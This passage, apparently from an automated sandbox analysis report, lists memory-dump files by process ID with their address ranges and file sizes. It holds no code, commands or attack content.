4KB
-
memory/4444-217-0x0000021F26ED0000-0x0000021F26F4E000-memory.dmpFilesize
504KB
-
memory/4444-224-0x0000021F09A85000-0x0000021F09A87000-memory.dmpFilesize
8KB
-
memory/4444-211-0x0000021F09A80000-0x0000021F09A82000-memory.dmpFilesize
8KB
-
memory/4444-198-0x0000021F09A20000-0x0000021F09A2B000-memory.dmpFilesize
44KB
-
memory/4444-206-0x0000021F23F90000-0x0000021F23F91000-memory.dmpFilesize
4KB
-
memory/4444-223-0x0000021F09A84000-0x0000021F09A85000-memory.dmpFilesize
4KB
-
memory/4456-268-0x0000000000DC0000-0x0000000000DC1000-memory.dmpFilesize
4KB
-
memory/4456-301-0x0000000005770000-0x0000000005771000-memory.dmpFilesize
4KB
-
memory/4456-250-0x0000000000000000-mapping.dmp
-
memory/4456-277-0x00000000017A0000-0x00000000017A1000-memory.dmpFilesize
4KB
-
memory/4600-178-0x0000000000000000-mapping.dmp
-
memory/4600-197-0x00000000001F0000-0x00000000001F1000-memory.dmpFilesize
4KB
-
memory/4600-205-0x0000000000700000-0x0000000000701000-memory.dmpFilesize
4KB
-
memory/4600-219-0x000000001AF40000-0x000000001AF42000-memory.dmpFilesize
8KB
-
memory/4604-177-0x0000000000000000-mapping.dmp
-
memory/4604-209-0x000000001B6B0000-0x000000001B6B2000-memory.dmpFilesize
8KB
-
memory/4604-184-0x0000000000B50000-0x0000000000B51000-memory.dmpFilesize
4KB
-
memory/4632-181-0x0000000000000000-mapping.dmp
-
memory/4632-239-0x0000000000400000-0x000000000044C000-memory.dmpFilesize
304KB
-
memory/4632-238-0x0000000000030000-0x0000000000039000-memory.dmpFilesize
36KB
-
memory/4640-237-0x0000000000470000-0x00000000005BA000-memory.dmpFilesize
1.3MB
-
memory/4640-240-0x0000000000400000-0x0000000000465000-memory.dmpFilesize
404KB
-
memory/4640-187-0x0000000000000000-mapping.dmp
-
memory/4668-253-0x0000000000000000-mapping.dmp
-
memory/4668-259-0x0000000000DE0000-0x0000000000DE1000-memory.dmpFilesize
4KB
-
memory/4748-339-0x0000000000000000-mapping.dmp
-
memory/4796-285-0x0000000000000000-mapping.dmp
-
memory/4820-243-0x0000000000AF0000-0x0000000000BC4000-memory.dmpFilesize
848KB
-
memory/4820-201-0x0000000000000000-mapping.dmp
-
memory/4820-244-0x0000000000400000-0x00000000004D7000-memory.dmpFilesize
860KB
-
memory/4860-353-0x00007FF646584060-mapping.dmp
-
memory/4860-367-0x000001C30BE20000-0x000001C30BE94000-memory.dmpFilesize
464KB
-
memory/4860-427-0x000001C30BDF0000-0x000001C30BE0B000-memory.dmpFilesize
108KB
-
memory/4860-432-0x000001C30E700000-0x000001C30E806000-memory.dmpFilesize
1.0MB
-
memory/4988-115-0x0000000000000000-mapping.dmp
-
memory/5080-276-0x0000000005880000-0x0000000005881000-memory.dmpFilesize
4KB
-
memory/5080-287-0x0000000005270000-0x0000000005271000-memory.dmpFilesize
4KB
-
memory/5080-309-0x0000000005270000-0x0000000005876000-memory.dmpFilesize
6.0MB
-
memory/5080-312-0x00000000052D0000-0x00000000052D1000-memory.dmpFilesize
4KB
-
memory/5080-262-0x0000000000400000-0x0000000000422000-memory.dmpFilesize
136KB
-
memory/5080-263-0x000000000041C5CA-mapping.dmp
-
memory/5080-292-0x00000000053A0000-0x00000000053A1000-memory.dmpFilesize
4KB
-
memory/5088-134-0x000000006B280000-0x000000006B2A6000-memory.dmpFilesize
152KB
-
memory/5088-186-0x0000000064940000-0x0000000064959000-memory.dmpFilesize
100KB
-
memory/5088-179-0x0000000064940000-0x0000000064959000-memory.dmpFilesize
100KB
-
memory/5088-169-0x0000000064940000-0x0000000064959000-memory.dmpFilesize
100KB
-
memory/5088-133-0x000000006FE40000-0x000000006FFC6000-memory.dmpFilesize
1.5MB
-
memory/5088-164-0x0000000064940000-0x0000000064959000-memory.dmpFilesize
100KB
-
memory/5088-132-0x000000006B440000-0x000000006B4CF000-memory.dmpFilesize
572KB
-
memory/5088-118-0x0000000000000000-mapping.dmp
-
memory/5128-466-0x0000000004EE0000-0x0000000004EE1000-memory.dmpFilesize
4KB
-
memory/5156-358-0x0000000000000000-mapping.dmp
-
memory/5156-423-0x000000001B7C0000-0x000000001B7C2000-memory.dmpFilesize
8KB
-
memory/5340-447-0x0000000000400000-0x0000000000414000-memory.dmpFilesize
80KB
-
memory/5340-374-0x0000000000000000-mapping.dmp
-
memory/5608-387-0x0000000000000000-mapping.dmp
-
memory/5616-391-0x0000000000000000-mapping.dmp
-
memory/5624-390-0x0000000000000000-mapping.dmp
-
memory/5632-389-0x0000000000000000-mapping.dmp
-
memory/5692-395-0x0000000000000000-mapping.dmp
-
memory/5736-396-0x0000000000000000-mapping.dmp
-
memory/5748-397-0x0000000000000000-mapping.dmp